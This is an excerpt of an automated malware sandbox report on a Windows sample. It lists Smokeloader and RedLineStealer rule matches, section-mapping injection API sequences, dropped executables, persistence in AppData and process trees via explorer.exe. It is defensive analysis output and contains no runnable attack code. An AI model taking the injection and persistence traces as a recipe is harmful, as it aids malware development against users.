      Source: 00000000.00000002.1768976686.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1769088650.000000000065B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.1769015337.0000000000611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000005.00000002.2060983151.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000005.00000002.2060932056.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000005.00000002.2060868077.00000000006F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.1768940641.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_00401513 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401513
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_00402FD3 RtlCreateUserThread,NtTerminateProcess,0_2_00402FD3
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_0040267C NtEnumerateKey,0_2_0040267C
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_004020C4 LocalAlloc,NtQuerySystemInformation,0_2_004020C4
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_004020E3 LocalAlloc,NtQuerySystemInformation,0_2_004020E3
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_004020E7 LocalAlloc,NtQuerySystemInformation,0_2_004020E7
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_004020FC LocalAlloc,NtQuerySystemInformation,0_2_004020FC
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_004020B6 LocalAlloc,NtQuerySystemInformation,0_2_004020B6
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_004020B8 LocalAlloc,NtQuerySystemInformation,0_2_004020B8
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_00403149 RtlCreateUserThread,NtTerminateProcess,0_2_00403149
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401553
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_00403303 NtTerminateProcess,GetModuleHandleA,CreateFileW,GetForegroundWindow,wcsstr,towlower,0_2_00403303
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_0040151E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040151E
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_004025DD NtOpenKey,0_2_004025DD
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_00401513 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401513
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_00402FD3 RtlCreateUserThread,NtTerminateProcess,5_2_00402FD3
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_0040267C NtEnumerateKey,5_2_0040267C
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_004020C4 LocalAlloc,NtQuerySystemInformation,5_2_004020C4
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_004020E3 LocalAlloc,NtQuerySystemInformation,5_2_004020E3
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_004020E7 LocalAlloc,NtQuerySystemInformation,5_2_004020E7
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_004020FC LocalAlloc,NtQuerySystemInformation,5_2_004020FC
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_004020B6 LocalAlloc,NtQuerySystemInformation,5_2_004020B6
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_004020B8 LocalAlloc,NtQuerySystemInformation,5_2_004020B8
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_00403149 RtlCreateUserThread,NtTerminateProcess,5_2_00403149
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401553
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_00403303 NtTerminateProcess,GetModuleHandleA,CreateFileW,GetForegroundWindow,wcsstr,5_2_00403303
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_0040151E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_0040151E
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_004025DD NtOpenKey,5_2_004025DD
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_004256730_2_00425673
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_0042512F0_2_0042512F
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_00426ACC0_2_00426ACC
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_00424BEB0_2_00424BEB
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_004256735_2_00425673
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_0042512F5_2_0042512F
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_00426ACC5_2_00426ACC
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_00424BEB5_2_00424BEB
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: 6_2_00007FF7DAD689206_2_00007FF7DAD68920
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: 6_2_00007FF7DAD682B26_2_00007FF7DAD682B2
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: 6_2_00007FF7DAD687FE6_2_00007FF7DAD687FE
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: 6_2_00007FF7DAD78A136_2_00007FF7DAD78A13
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: 6_2_00007FF7DAD682106_2_00007FF7DAD68210
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: 6_2_00007FF7DAD67DDE6_2_00007FF7DAD67DDE
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: 6_2_00007FF7DAD67DE46_2_00007FF7DAD67DE4
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: 6_2_00007FF7DAD615E66_2_00007FF7DAD615E6
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: 6_2_00007FF7DADF3FF06_2_00007FF7DADF3FF0
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: 6_2_00007FF7DAD66BD06_2_00007FF7DAD66BD0
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: 6_2_00007FF7DAD6A5736_2_00007FF7DAD6A573
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: 6_2_00007FF7DAD66D206_2_00007FF7DAD66D20
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: 6_2_00007FF7DAD649306_2_00007FF7DAD64930
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: 6_2_00007FF7DAD647096_2_00007FF7DAD64709
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: 6_2_00007FF7DAD712E06_2_00007FF7DAD712E0
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: 6_2_00007FF7DAD64EC06_2_00007FF7DAD64EC0
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: 6_2_00007FF7DAD67CD56_2_00007FF7DAD67CD5
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: 6_2_00007FF7DAD66D206_2_00007FF7DAD66D20
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: 6_2_00007FF7DAD680A06_2_00007FF7DAD680A0
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: 6_2_00007FF7DAD686B06_2_00007FF7DAD686B0
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: 6_2_00007FF7DAD614746_2_00007FF7DAD61474
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: 6_2_00007FF7DAD71C406_2_00007FF7DAD71C40
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: 6_2_00007FF7DAD67A2D6_2_00007FF7DAD67A2D
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: 6_2_00007FF7DAD614306_2_00007FF7DAD61430
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B042A707_2_00007FF65B042A70
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B039E907_2_00007FF65B039E90
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B1564A07_2_00007FF65B1564A0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0395507_2_00007FF65B039550
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B043D807_2_00007FF65B043D80
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03A7C07_2_00007FF65B03A7C0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0393C07_2_00007FF65B0393C0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0427F07_2_00007FF65B0427F0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03AFF07_2_00007FF65B03AFF0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03BFE07_2_00007FF65B03BFE0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B1560207_2_00007FF65B156020
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B1562207_2_00007FF65B156220
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B095C407_2_00007FF65B095C40
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03343A7_2_00007FF65B03343A
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0400407_2_00007FF65B040040
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0962707_2_00007FF65B096270
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03D4607_2_00007FF65B03D460
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B069E607_2_00007FF65B069E60
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B080A607_2_00007FF65B080A60
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B032C907_2_00007FF65B032C90
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03BC907_2_00007FF65B03BC90
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03E0907_2_00007FF65B03E090
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B07D2907_2_00007FF65B07D290
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0800907_2_00007FF65B080090
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B044C807_2_00007FF65B044C80
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B038A807_2_00007FF65B038A80
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B046A807_2_00007FF65B046A80
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0488807_2_00007FF65B048880
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B04A2807_2_00007FF65B04A280
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03F8B07_2_00007FF65B03F8B0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0416B07_2_00007FF65B0416B0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B034CA07_2_00007FF65B034CA0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03EAA07_2_00007FF65B03EAA0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B045AC97_2_00007FF65B045AC9
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0C60D07_2_00007FF65B0C60D0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0966D07_2_00007FF65B0966D0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0398D07_2_00007FF65B0398D0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B041AD07_2_00007FF65B041AD0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0D42C07_2_00007FF65B0D42C0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0684C07_2_00007FF65B0684C0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0472F07_2_00007FF65B0472F0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B07DCF07_2_00007FF65B07DCF0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0350E07_2_00007FF65B0350E0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03C4E07_2_00007FF65B03C4E0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0350DF7_2_00007FF65B0350DF
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0433107_2_00007FF65B043310
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B095F007_2_00007FF65B095F00
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03D9007_2_00007FF65B03D900
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03C9307_2_00007FF65B03C930
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0439307_2_00007FF65B043930
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03BB207_2_00007FF65B03BB20
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03F7207_2_00007FF65B03F720
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B067F207_2_00007FF65B067F20
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0959407_2_00007FF65B095940
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0FA5707_2_00007FF65B0FA570
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0409707_2_00007FF65B040970
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0345747_2_00007FF65B034574
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B07D7707_2_00007FF65B07D770
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0805707_2_00007FF65B080570
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0957607_2_00007FF65B095760
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B039D5A7_2_00007FF65B039D5A
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B06B7607_2_00007FF65B06B760
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0391907_2_00007FF65B039190
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03D1907_2_00007FF65B03D190
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B045D907_2_00007FF65B045D90
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B04A3907_2_00007FF65B04A390
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03E7807_2_00007FF65B03E780
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0495807_2_00007FF65B049580
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0CB7B07_2_00007FF65B0CB7B0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03D7B07_2_00007FF65B03D7B0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03E3B07_2_00007FF65B03E3B0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0807B07_2_00007FF65B0807B0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0403A07_2_00007FF65B0403A0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0471A07_2_00007FF65B0471A0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0383D07_2_00007FF65B0383D0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0387D07_2_00007FF65B0387D0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03ABD07_2_00007FF65B03ABD0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0475C07_2_00007FF65B0475C0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B044FF07_2_00007FF65B044FF0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0325E07_2_00007FF65B0325E0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0337E07_2_00007FF65B0337E0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B041DE07_2_00007FF65B041DE0
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03D0107_2_00007FF65B03D010
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0680107_2_00007FF65B068010
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0466007_2_00007FF65B046600
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B07DA007_2_00007FF65B07DA00
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0C8E307_2_00007FF65B0C8E30
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B0408307_2_00007FF65B040830
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B03FC307_2_00007FF65B03FC30
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B07E8307_2_00007FF65B07E830
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B048C307_2_00007FF65B048C30
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B039C207_2_00007FF65B039C20
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B154E107_2_00007FF65B154E10
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 9_2_004256739_2_00425673
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 9_2_00426ACC9_2_00426ACC
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 9_2_00425D6B9_2_00425D6B
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 9_2_0042512F9_2_0042512F
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 9_2_00424BEB9_2_00424BEB
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 9_2_00402D8C9_2_00402D8C
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\70C1.exe 910E7F453F7842758E874A6AC98301F157E4EA6F9C6CA8A8E2AC0983D03D989B
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\AA31.exe F1530D12529D8B0ED379457FEEE1A7CFC223596F455EA0D0771F414699BC88F5
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: String function: 00007FF65B038A80 appears 35 times
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeCode function: String function: 00007FF7DAD67DE4 appears 33 times
      Source: 70C1.exe.1.drStatic PE information: Number of sections : 11 > 10
      Source: AA31.exe.1.drStatic PE information: Number of sections : 11 > 10
      Source: n72I7qB2ss.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000005.00000002.2060795194.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000002.1768976686.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1769088650.000000000065B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.1769015337.0000000000611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000005.00000002.2060983151.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000005.00000002.2060932056.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000005.00000002.2060868077.00000000006F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.1768940641.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@9/5
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_0065EAC0 CreateToolhelp32Snapshot,Module32First,0_2_0065EAC0
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ashcvvsJump to behavior
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\70C1.tmpJump to behavior
      Source: C:\Users\user\AppData\Roaming\ashcvvsCommand line argument: pq@9_2_004070C0
      Source: n72I7qB2ss.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: n72I7qB2ss.exeReversingLabs: Detection: 71%
      Source: n72I7qB2ss.exeVirustotal: Detection: 58%
      Source: unknownProcess created: C:\Users\user\Desktop\n72I7qB2ss.exe "C:\Users\user\Desktop\n72I7qB2ss.exe"
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ashcvvs C:\Users\user\AppData\Roaming\ashcvvs
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\70C1.exe C:\Users\user\AppData\Local\Temp\70C1.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\AA31.exe C:\Users\user\AppData\Local\Temp\AA31.exe
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ashcvvs C:\Users\user\AppData\Roaming\ashcvvs
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\70C1.exe C:\Users\user\AppData\Local\Temp\70C1.exeJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\AA31.exe C:\Users\user\AppData\Local\Temp\AA31.exeJump to behavior
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ashcvvsSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ashcvvsSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ashcvvsSection loaded: msvcr100.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: apphelp.dllJump to behavior
